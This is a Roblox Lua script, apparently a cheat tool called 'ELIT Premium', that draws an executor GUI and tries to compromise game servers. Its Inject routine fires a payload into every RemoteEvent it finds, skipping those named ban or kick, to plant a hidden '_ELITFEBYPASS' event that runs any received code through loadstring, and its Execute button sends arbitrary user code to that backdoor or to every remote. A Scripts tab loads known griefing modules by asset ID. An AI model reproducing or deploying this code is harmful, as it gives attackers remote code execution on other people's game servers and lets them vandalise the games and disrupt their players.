print("ELIT Premium UI Loaded")

----------------------------------------------------------------
-- СЕРВИСЫ
----------------------------------------------------------------
local TweenService = game:GetService("TweenService")
local CoreGui = game:GetService("CoreGui")
local UserInputService = game:GetService("UserInputService")
local Players = game:GetService("Players")
local JointsService = game:GetService("JointsService")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local RunService = game:GetService("RunService")
local TextService = game:GetService("TextService")

----------------------------------------------------------------
-- НАСТРОЙКИ ТЕМ
----------------------------------------------------------------
local Theme = "Dark" -- "Dark" или "Light" по умолчанию

local Colors = {
	Dark = {
		MainBg = Color3.fromRGB(20,20,28),
		TopBar = Color3.fromRGB(30,30,40),
		Tabs = Color3.fromRGB(18,18,24),
		PageBg = Color3.fromRGB(25,25,32),
		CodeBg = Color3.fromRGB(15,15,20),
		CodeText = Color3.fromRGB(220,200,255),
		ButtonBase = Color3.fromRGB(80,70,140),
		ButtonText = Color3.fromRGB(255,255,255),
		Stroke = Color3.fromRGB(140,120,255),
		StatusGreen = Color3.fromRGB(0,255,120),
		StatusYellow = Color3.fromRGB(255,200,0),
		StatusRed = Color3.fromRGB(255,50,50),
		TextPrimary = Color3.fromRGB(255,255,255),
		TextSecondary = Color3.fromRGB(200,180,255)
	},
	Light = {
		MainBg = Color3.fromRGB(245,245,245),
		TopBar = Color3.fromRGB(230,230,230),
		Tabs = Color3.fromRGB(220,220,230),
		PageBg = Color3.fromRGB(240,240,245),
		CodeBg = Color3.fromRGB(255,255,255),
		CodeText = Color3.fromRGB(30,30,40),
		ButtonBase = Color3.fromRGB(130,110,180),
		ButtonText = Color3.fromRGB(255,255,255),
		Stroke = Color3.fromRGB(100,80,140),
		StatusGreen = Color3.fromRGB(0,180,80),
		StatusYellow = Color3.fromRGB(220,180,0),
		StatusRed = Color3.fromRGB(220,50,50),
		TextPrimary = Color3.fromRGB(20,20,30),
		TextSecondary = Color3.fromRGB(60,60,80)
	}
}

-- Функция для радужного цвета (как в оригинале)
local function rgb(t)
	return Color3.fromHSV((t % 6) / 6, 0.7, 1)
end

----------------------------------------------------------------
-- ЗАГРУЗКА (Loading Screen)
----------------------------------------------------------------
local LoadingGui = Instance.new("ScreenGui", CoreGui)
LoadingGui.Name = "ElitLoading"
LoadingGui.ResetOnSpawn = false

local LoadingOverlay = Instance.new("Frame", LoadingGui)
LoadingOverlay.Size = UDim2.new(1,0,1,0)
LoadingOverlay.Position = UDim2.new(0,0,0,0)
LoadingOverlay.BackgroundColor3 = Color3.fromRGB(0,0,0)
LoadingOverlay.BackgroundTransparency = 1
LoadingOverlay.BorderSizePixel = 0

local WelcomeCircle = Instance.new("ImageLabel", LoadingOverlay)
WelcomeCircle.Size = UDim2.new(0,0,0,0)
WelcomeCircle.Position = UDim2.new(0.5,0,0.5,0)
WelcomeCircle.AnchorPoint = Vector2.new(0.5,0.5)
WelcomeCircle.BackgroundTransparency = 1
WelcomeCircle.Image = "rbxassetid://16678640854"
WelcomeCircle.ZIndex = 10

local WelcomeText = Instance.new("TextLabel", LoadingOverlay)
WelcomeText.Size = UDim2.new(0,400,0,40)
WelcomeText.Position = UDim2.new(0.5,0,0.5,120)
WelcomeText.AnchorPoint = Vector2.new(0.5,0.5)
WelcomeText.BackgroundTransparency = 1
WelcomeText.Text = "Welcome!"
WelcomeText.Font = Enum.Font.GothamBold
WelcomeText.TextSize = 28
WelcomeText.TextColor3 = Color3.fromRGB(255,255,255)
WelcomeText.ZIndex = 11
WelcomeText.TextStrokeTransparency = 1

TweenService:Create(LoadingOverlay, TweenInfo.new(0.35), {BackgroundTransparency = 0.6}):Play()
task.wait(0.1)
TweenService:Create(WelcomeCircle, TweenInfo.new(0.5, Enum.EasingStyle.Elastic, Enum.EasingDirection.Out), {Size = UDim2.new(0,200,0,200)}):Play()
TweenService:Create(WelcomeText, TweenInfo.new(0.5, Enum.EasingStyle.Quad), {TextTransparency = 0}):Play()
task.wait(1.6)
TweenService:Create(WelcomeCircle, TweenInfo.new(0.45), {Size = UDim2.new(0,0,0,0)}):Play()
TweenService:Create(LoadingOverlay, TweenInfo.new(0.45), {BackgroundTransparency = 1}):Play()
TweenService:Create(WelcomeText, TweenInfo.new(0.45), {TextTransparency = 1}):Play()
task.wait(0.5)
LoadingGui:Destroy()

----------------------------------------------------------------
-- ОСНОВНОЙ GUI
----------------------------------------------------------------
local Gui = Instance.new("ScreenGui", CoreGui)
Gui.Name = "ElitPremium"
Gui.ResetOnSpawn = false

local Main = Instance.new("Frame", Gui)
Main.Name = "Main"
Main.Size = UDim2.new(0, 760, 0, 440)
Main.Position = UDim2.new(0.5, 0, 0.5, 0)
Main.AnchorPoint = Vector2.new(0.5,0.5)
Main.BackgroundColor3 = Colors[Theme].MainBg
Main.BorderSizePixel = 0
Instance.new("UICorner", Main).CornerRadius = UDim.new(0,12)

local MainStroke = Instance.new("UIStroke", Main)
MainStroke.Color = Colors[Theme].Stroke
MainStroke.Thickness = 2

-- Радужная обводка (как в оригинале)
RunService.RenderStepped:Connect(function()
	MainStroke.Color = rgb(tick())
end)

----------------------------------------------------------------
-- DRAGGING
----------------------------------------------------------------
local dragging = false
local dragInput, mousePos, framePos

Main.InputBegan:Connect(function(input)
	if input.UserInputType == Enum.UserInputType.MouseButton1 then
		dragging = true
		mousePos = input.Position
		framePos = Main.Position
		input.Changed:Connect(function()
			if input.UserInputState == Enum.UserInputState.End then
				dragging = false
			end
		end)
	end
end)

Main.InputChanged:Connect(function(input)
	if input.UserInputType == Enum.UserInputType.MouseMovement then
		dragInput = input
	end
end)

UserInputService.InputChanged:Connect(function(input)
	if dragging and input == dragInput then
		local delta = input.Position - mousePos
		Main.Position = UDim2.new(framePos.X.Scale, framePos.X.Offset + delta.X, framePos.Y.Scale, framePos.Y.Offset + delta.Y)
	end
end)

----------------------------------------------------------------
-- TOP BAR (без кнопки закрытия)
----------------------------------------------------------------
local TopBar = Instance.new("Frame", Main)
TopBar.Size = UDim2.new(1,0,0,46)
TopBar.BackgroundColor3 = Colors[Theme].TopBar
TopBar.BorderSizePixel = 0
Instance.new("UICorner", TopBar).CornerRadius = UDim.new(0,12)

local Title = Instance.new("TextLabel", TopBar)
Title.Size = UDim2.new(1,-200,1,0) -- Оставляем место для статуса справа
Title.Position = UDim2.new(0,20,0,0)
Title.BackgroundTransparency = 1
Title.Text = "ELIT SCANNER  |  By SM1LE"
Title.Font = Enum.Font.GothamBold
Title.TextSize = 17
Title.TextXAlignment = Enum.TextXAlignment.Left
Title.TextColor3 = Colors[Theme].TextPrimary

----------------------------------------------------------------
-- СТАТУС (переделанный - кружок рядом с текстом)
----------------------------------------------------------------
local StatusContainer = Instance.new("Frame", TopBar)
StatusContainer.Size = UDim2.new(0, 100, 1, 0)
StatusContainer.Position = UDim2.new(1, -110, 0, 0)
StatusContainer.BackgroundTransparency = 1

-- Кружок статуса
local StatusCircle = Instance.new("Frame", StatusContainer)
StatusCircle.Size = UDim2.new(0, 10, 0, 10)
StatusCircle.Position = UDim2.new(0, 0, 0.5, -5)
StatusCircle.BackgroundColor3 = Colors[Theme].StatusGreen
StatusCircle.BorderSizePixel = 0
Instance.new("UICorner", StatusCircle).CornerRadius = UDim.new(1, 0)

-- Текст статуса
local StatusLabel = Instance.new("TextLabel", StatusContainer)
StatusLabel.Size = UDim2.new(1, -15, 1, 0)
StatusLabel.Position = UDim2.new(0, 15, 0, 0)
StatusLabel.BackgroundTransparency = 1
StatusLabel.Text = "READY"
StatusLabel.Font = Enum.Font.GothamBold
StatusLabel.TextSize = 13
StatusLabel.TextXAlignment = Enum.TextXAlignment.Left
StatusLabel.TextColor3 = Colors[Theme].TextPrimary

-- Функция обновления статуса
local function SetStatus(text, color)
	StatusLabel.Text = text
	StatusCircle.BackgroundColor3 = color or Colors[Theme].StatusGreen
end

----------------------------------------------------------------
-- TAB SYSTEM
----------------------------------------------------------------
local Tabs = Instance.new("Frame", Main)
Tabs.Position = UDim2.new(0,15,0,60)
Tabs.Size = UDim2.new(0,180,1,-75)
Tabs.BackgroundColor3 = Colors[Theme].Tabs
Tabs.BorderSizePixel = 0
Instance.new("UICorner", Tabs).CornerRadius = UDim.new(0,10)

local TabLayout = Instance.new("UIListLayout", Tabs)
TabLayout.Padding = UDim.new(0,10)

local Pages = Instance.new("Frame", Main)
Pages.Position = UDim2.new(0,210,0,60)
Pages.Size = UDim2.new(1,-225,1,-75)
Pages.BackgroundTransparency = 1

local function createPage(name)
	local page = Instance.new("Frame", Pages)
	page.Name = name
	page.Size = UDim2.new(1,0,1,0)
	page.Visible = false
	page.BackgroundColor3 = Colors[Theme].PageBg
	page.BorderSizePixel = 0
	Instance.new("UICorner", page).CornerRadius = UDim.new(0,10)
	return page
end

local ExecutorPage = createPage("Executor")
local ScriptsPage = createPage("Scripts")
local SettingsPage = createPage("Settings")
ExecutorPage.Visible = true

local function switchPage(page)
	for _,p in pairs(Pages:GetChildren()) do
		p.Visible = false
	end
	page.Visible = true
end

local function createTabButton(text,page)
	local btn = Instance.new("TextButton", Tabs)
	btn.Size = UDim2.new(1,-20,0,40)
	btn.BackgroundColor3 = Colors[Theme].ButtonBase
	btn.Text = text
	btn.Font = Enum.Font.GothamBold
	btn.TextSize = 14
	btn.TextColor3 = Colors[Theme].ButtonText
	btn.BorderSizePixel = 0
	btn.AutoButtonColor = false
	Instance.new("UICorner", btn).CornerRadius = UDim.new(0,8)

	local grad = Instance.new("UIGradient", btn)
	grad.Color = ColorSequence.new{
		ColorSequenceKeypoint.new(0, Color3.fromRGB(100,70,200)), 
		ColorSequenceKeypoint.new(1, Color3.fromRGB(160,120,255))
	}
	grad.Rotation = 45

	btn.MouseButton1Click:Connect(function()
		switchPage(page)
	end)
	return btn
end

createTabButton("Executor",ExecutorPage)
createTabButton("Scripts",ScriptsPage)
createTabButton("Settings",SettingsPage)

----------------------------------------------------------------
-- EXECUTOR PAGE
----------------------------------------------------------------
-- Сначала создаем Frame для кнопок внизу
local ButtonFrame = Instance.new("Frame", ExecutorPage)
ButtonFrame.Size = UDim2.new(1,-30,0,40)
ButtonFrame.Position = UDim2.new(0,15,1,-50)
ButtonFrame.BackgroundTransparency = 1

-- Затем создаем TextBox на всю оставшуюся высоту
local CodeBox = Instance.new("TextBox", ExecutorPage)
CodeBox.Size = UDim2.new(1,-30,1,-70)
CodeBox.Position = UDim2.new(0,15,0,15)
CodeBox.MultiLine = true
CodeBox.ClearTextOnFocus = false
CodeBox.Text = ""
CodeBox.Font = Enum.Font.Code
CodeBox.TextSize = 14
CodeBox.TextXAlignment = Enum.TextXAlignment.Left
CodeBox.TextYAlignment = Enum.TextYAlignment.Top
CodeBox.BackgroundColor3 = Colors[Theme].CodeBg
CodeBox.TextColor3 = Colors[Theme].CodeText
CodeBox.BorderSizePixel = 0
CodeBox.PlaceholderColor3 = Colors[Theme].TextSecondary
CodeBox.PlaceholderText = "-- write your code here"
Instance.new("UICorner", CodeBox).CornerRadius = UDim.new(0,8)

-- Добавляем обводку для текстбокса
local CodeBoxStroke = Instance.new("UIStroke", CodeBox)
CodeBoxStroke.Color = Colors[Theme].Stroke
CodeBoxStroke.Thickness = 1.5
CodeBoxStroke.Transparency = 0.3

-- Анимация нажатия кнопки
local function clickAnim(btn)
	local s = btn.Size
	TweenService:Create(btn, TweenInfo.new(0.08), {
		Size = s - UDim2.fromOffset(6,6)
	}):Play()
	task.wait(0.08)
	TweenService:Create(btn, TweenInfo.new(0.15, Enum.EasingStyle.Back), {
		Size = s
	}):Play()
end

-- Execute button
local Execute = Instance.new("TextButton", ButtonFrame)
Execute.Size = UDim2.new(0.48,-8,1,0)
Execute.Position = UDim2.new(0,0,0,0)
Execute.Text = "EXECUTE"
Execute.Font = Enum.Font.GothamBold
Execute.TextSize = 14
Execute.TextColor3 = Colors[Theme].ButtonText
Execute.BackgroundColor3 = Colors[Theme].ButtonBase
Instance.new("UICorner", Execute).CornerRadius = UDim.new(0,8)
local gradExecute = Instance.new("UIGradient", Execute)
gradExecute.Color = ColorSequence.new{
	ColorSequenceKeypoint.new(0, Color3.fromRGB(100,70,200)),
	ColorSequenceKeypoint.new(1, Color3.fromRGB(160,120,255))
}
gradExecute.Rotation = 45

-- Inject button
local Inject = Instance.new("TextButton", ButtonFrame)
Inject.Size = UDim2.new(0.48,-8,1,0)
Inject.Position = UDim2.new(0.52,0,0,0)
Inject.Text = "INJECT"
Inject.Font = Enum.Font.GothamBold
Inject.TextSize = 14
Inject.TextColor3 = Colors[Theme].ButtonText
Inject.BackgroundColor3 = Colors[Theme].ButtonBase
Instance.new("UICorner", Inject).CornerRadius = UDim.new(0,8)
local gradInject = Instance.new("UIGradient", Inject)
gradInject.Color = ColorSequence.new{
	ColorSequenceKeypoint.new(0, Color3.fromRGB(100,70,200)),
	ColorSequenceKeypoint.new(1, Color3.fromRGB(160,120,255))
}
gradInject.Rotation = 45

----------------------------------------------------------------
-- ЛОГИКА ИНЖЕКТА (как в оригинале)
----------------------------------------------------------------
local injected = false

local function tryInject(remote)
	pcall(function()
		remote:FireServer([[
			if not game:GetService("JointsService"):FindFirstChild("_ELITFEBYPASS") then
				local e = Instance.new("RemoteEvent")
				e.Name = "_ELITFEBYPASS"
				e.Parent = game:GetService("JointsService")

				local loadstring = loadstring or function(s) return load(s) end
				e.OnServerEvent:Connect(function(_,code)
					loadstring(code)()
				end)
			end
		]])
	end)
end

local function scanForRemotes(obj)
	for _,v in ipairs(obj:GetChildren()) do
		if v:IsA("RemoteEvent")
		and not v.Name:lower():match("ban")
		and not v.Name:lower():match("kick") then
			tryInject(v)
		end
		scanForRemotes(v)
	end
end

Inject.MouseButton1Click:Connect(function()
	if injected then 
		SetStatus("ALREADY INJECTED", Colors[Theme].StatusYellow)
		return 
	end
	
	clickAnim(Inject)
	SetStatus("INJECTING...", Colors[Theme].StatusYellow)
	
	-- Сканируем ReplicatedStorage для поиска RemoteEvent
	scanForRemotes(ReplicatedStorage)
	
	-- Ждем появления нашего RemoteEvent
	local timeout = 0
	while not JointsService:FindFirstChild("_ELITFEBYPASS") and timeout < 6 do
		task.wait(0.1)
		timeout = timeout + 0.1
	end
	
	if JointsService:FindFirstChild("_ELITFEBYPASS") then
		injected = true
		Inject.Text = "INJECTED"
		Inject.BackgroundColor3 = Color3.fromRGB(40,120,70)
		gradInject.Color = ColorSequence.new{
			ColorSequenceKeypoint.new(0, Color3.fromRGB(40,120,70)),
			ColorSequenceKeypoint.new(1, Color3.fromRGB(80,180,120))
		}
		SetStatus("INJECTED", Colors[Theme].StatusGreen)
		
		-- Отправляем приветственное сообщение
		JointsService._ELITFEBYPASS:FireServer([[
			local h = Instance.new("Hint", workspace)
			h.Text = "ELIT Premium | Successfully Injected!"
		]])
	else
		Inject.Text = "FAILED"
		Inject.BackgroundColor3 = Color3.fromRGB(120,40,40)
		gradInject.Color = ColorSequence.new{
			ColorSequenceKeypoint.new(0, Color3.fromRGB(120,40,40)),
			ColorSequenceKeypoint.new(1, Color3.fromRGB(180,80,80))
		}
		SetStatus("INJECT FAILED", Colors[Theme].StatusRed)
	end
end)

----------------------------------------------------------------
-- ЛОГИКА ИСПОЛНЕНИЯ СКРИПТОВ (улучшенная)
----------------------------------------------------------------
local AcquiredRemote = nil
local IsAcquiring = false

local function DeepFire(inst, codeStr)
	if not IsAcquiring then
		if AcquiredRemote == nil then
			-- Сначала пробуем использовать инжектнутый RemoteEvent
			local injectedRemote = JointsService:FindFirstChild("_ELITFEBYPASS")
			if injectedRemote and injectedRemote:IsA("RemoteEvent") then
				injectedRemote:FireServer(codeStr)
				return
			end
			
			-- Иначе ищем другие RemoteEvent
			for _, child in pairs(inst:GetChildren()) do
				if child.Parent ~= ReplicatedStorage then
					if child:IsA("RemoteEvent") then
						child:FireServer(codeStr)
					elseif child:IsA("RemoteFunction") then
						task.spawn(function()
							child:InvokeServer(codeStr)
						end)
					end
				end
				DeepFire(child, codeStr)
			end
		else
			if AcquiredRemote:IsA("RemoteEvent") then
				AcquiredRemote:FireServer(codeStr)
			elseif AcquiredRemote:IsA("RemoteFunction") then
				task.spawn(function()
					AcquiredRemote:InvokeServer(codeStr)
				end)
			end
		end
	end
end

Execute.MouseButton1Click:Connect(function()
	clickAnim(Execute)
	
	local codeStr = CodeBox.Text
	if codeStr == "" then
		SetStatus("NO CODE", Colors[Theme].StatusYellow)
		return
	end
	
	SetStatus("EXECUTING...", Colors[Theme].StatusYellow)
	
	task.spawn(function()
		-- Пробуем выполнить через инжектнутый RemoteEvent
		local injectedRemote = JointsService:FindFirstChild("_ELITFEBYPASS")
		if injectedRemote and injectedRemote:IsA("RemoteEvent") then
			injectedRemote:FireServer(codeStr)
		else
			-- Иначе через стандартный поиск
			DeepFire(game, codeStr)
		end
	end)
	
	task.wait(0.5)
	SetStatus("READY", Colors[Theme].StatusGreen)
end)

----------------------------------------------------------------
-- SCRIPTS PAGE
----------------------------------------------------------------
local Scroller = Instance.new("ScrollingFrame", ScriptsPage)
Scroller.Size = UDim2.new(1,-20,1,-20)
Scroller.Position = UDim2.new(0,10,0,10)
Scroller.BackgroundTransparency = 1
Scroller.BorderSizePixel = 0
Scroller.CanvasSize = UDim2.new(0,0,0,0)
Scroller.ScrollBarThickness = 10
Scroller.ScrollBarImageColor3 = Color3.fromRGB(140,120,255)

local UIList = Instance.new("UIListLayout", Scroller)
UIList.Padding = UDim.new(0,8)
UIList.SortOrder = Enum.SortOrder.LayoutOrder

local scripts = {
	["Admin"] = 'require(7192763922).load("User")',
	["k00pgui"] = 'require(14829670677).EDITL0L("User")',
	["C00lgui"] = 'require(133464960745567).woawsoc00l("User")',
	["RC7"] = 'require(12350030542).RC7("User")',
	["9/11 Script"] = 'require(104367394058340).load("User")',
	["RoXploit"] = 'require(96184029574075)("User")',
	["KFC Map"] = 'require(3615713971).load("User")',
	["C4"] = 'require(0x1767bf813)("User")',
	["Doge Army"] = 'require(5115249013).fehack("User")',
	["Dex"] = 'require(14572394952)("User")',
	["DreambullGui"] = 'require(15232587754).DreamGUI("User")',
	["Polaria"] = 'require(123255432303221):Pload("User")'
}

for name,code in pairs(scripts) do
	local btn = Instance.new("TextButton", Scroller)
	btn.Size = UDim2.new(1,0,0,40)
	btn.Text = name
	btn.Font = Enum.Font.GothamBold
	btn.TextSize = 14
	btn.TextColor3 = Colors[Theme].ButtonText
	btn.BackgroundColor3 = Colors[Theme].ButtonBase
	btn.BorderSizePixel = 0
	Instance.new("UICorner", btn).CornerRadius = UDim.new(0,6)
	local grad = Instance.new("UIGradient", btn)
	grad.Color = ColorSequence.new{
		ColorSequenceKeypoint.new(0, Color3.fromRGB(100,70,200)),
		ColorSequenceKeypoint.new(1, Color3.fromRGB(160,120,255))
	}
	grad.Rotation = 45
	
	btn.MouseButton1Click:Connect(function()
		clickAnim(btn)
		CodeBox.Text = code
		switchPage(ExecutorPage)
	end)
end

UIList:GetPropertyChangedSignal("AbsoluteContentSize"):Connect(function()
	Scroller.CanvasSize = UDim2.new(0,0,0,UIList.AbsoluteContentSize.Y + 10)
end)

----------------------------------------------------------------
-- SETTINGS PAGE
----------------------------------------------------------------
local SettingsLabel = Instance.new("TextLabel", SettingsPage)
SettingsLabel.Size = UDim2.new(1,0,0,40)
SettingsLabel.Position = UDim2.new(0,0,0,20)
SettingsLabel.BackgroundTransparency = 1
SettingsLabel.Text = "Settings"
SettingsLabel.Font = Enum.Font.GothamBold
SettingsLabel.TextSize = 18
SettingsLabel.TextColor3 = Colors[Theme].TextPrimary

-- Theme Toggle
local ThemeBtn = Instance.new("TextButton", SettingsPage)
ThemeBtn.Size = UDim2.new(0,200,0,45)
ThemeBtn.Position = UDim2.new(0.5,-100,0,80)
ThemeBtn.Text = "Toggle Theme (Dark)"
ThemeBtn.Font = Enum.Font.GothamBold
ThemeBtn.TextSize = 14
ThemeBtn.TextColor3 = Colors[Theme].ButtonText
ThemeBtn.BackgroundColor3 = Colors[Theme].ButtonBase
Instance.new("UICorner", ThemeBtn).CornerRadius = UDim.new(0,8)
local gradTheme = Instance.new("UIGradient", ThemeBtn)
gradTheme.Color = ColorSequence.new{
	ColorSequenceKeypoint.new(0, Color3.fromRGB(100,70,200)),
	ColorSequenceKeypoint.new(1, Color3.fromRGB(160,120,255))
}
gradTheme.Rotation = 45

-- Text color preview
local TextPreview = Instance.new("TextLabel", SettingsPage)
TextPreview.Size = UDim2.new(0,300,0,30)
TextPreview.Position = UDim2.new(0.5,-150,0,150)
TextPreview.BackgroundTransparency = 1
TextPreview.Text = "This text should be visible"
TextPreview.Font = Enum.Font.Gotham
TextPreview.TextSize = 14
TextPreview.TextColor3 = Colors[Theme].TextPrimary

local TextPreview2 = Instance.new("TextLabel", SettingsPage)
TextPreview2.Size = UDim2.new(0,300,0,30)
TextPreview2.Position = UDim2.new(0.5,-150,0,180)
TextPreview2.BackgroundTransparency = 1
TextPreview2.Text = "Secondary text example"
TextPreview2.Font = Enum.Font.Gotham
TextPreview2.TextSize = 14
TextPreview2.TextColor3 = Colors[Theme].TextSecondary

ThemeBtn.MouseButton1Click:Connect(function()
	clickAnim(ThemeBtn)
	
	if Theme == "Dark" then
		Theme = "Light"
		ThemeBtn.Text = "Toggle Theme (Light)"
	else
		Theme = "Dark"
		ThemeBtn.Text = "Toggle Theme (Dark)"
	end
	
	-- Обновляем цвета
	Main.BackgroundColor3 = Colors[Theme].MainBg
	MainStroke.Color = Colors[Theme].Stroke
	TopBar.BackgroundColor3 = Colors[Theme].TopBar
	Title.TextColor3 = Colors[Theme].TextPrimary
	StatusLabel.TextColor3 = Colors[Theme].TextPrimary
	Tabs.BackgroundColor3 = Colors[Theme].Tabs
	
	for _,page in pairs(Pages:GetChildren()) do
		page.BackgroundColor3 = Colors[Theme].PageBg
	end
	
	CodeBox.BackgroundColor3 = Colors[Theme].CodeBg
	CodeBox.TextColor3 = Colors[Theme].CodeText
	CodeBox.PlaceholderColor3 = Colors[Theme].TextSecondary
	CodeBoxStroke.Color = Colors[Theme].Stroke
	
	-- Обновляем текст кнопок (градиенты остаются)
	for _,btn in pairs(Tabs:GetChildren()) do
		if btn:IsA("TextButton") then
			btn.TextColor3 = Colors[Theme].ButtonText
		end
	end
	
	for _,btn in pairs(Scroller:GetChildren()) do
		if btn:IsA("TextButton") then
			btn.TextColor3 = Colors[Theme].ButtonText
		end
	end
	
	Execute.TextColor3 = Colors[Theme].ButtonText
	Inject.TextColor3 = Colors[Theme].ButtonText
	ThemeBtn.TextColor3 = Colors[Theme].ButtonText
	
	-- Обновляем текстовые элементы в Settings
	SettingsLabel.TextColor3 = Colors[Theme].TextPrimary
	TextPreview.TextColor3 = Colors[Theme].TextPrimary
	TextPreview2.TextColor3 = Colors[Theme].TextSecondary
	VersionLabel.TextColor3 = Colors[Theme].TextSecondary
end)

-- Status label for settings
local VersionLabel = Instance.new("TextLabel", SettingsPage)
VersionLabel.Size = UDim2.new(1,0,0,30)
VersionLabel.Position = UDim2.new(0,0,1,-40)
VersionLabel.BackgroundTransparency = 1
VersionLabel.Text = "ELIT Premium v2.0 | by sm1le"
VersionLabel.Font = Enum.Font.Gotham
VersionLabel.TextSize = 12
VersionLabel.TextColor3 = Colors[Theme].TextSecondary
VersionLabel.TextTransparency = 0.5

-- Устанавливаем начальный статус
SetStatus("READY", Colors[Theme].StatusGreen)
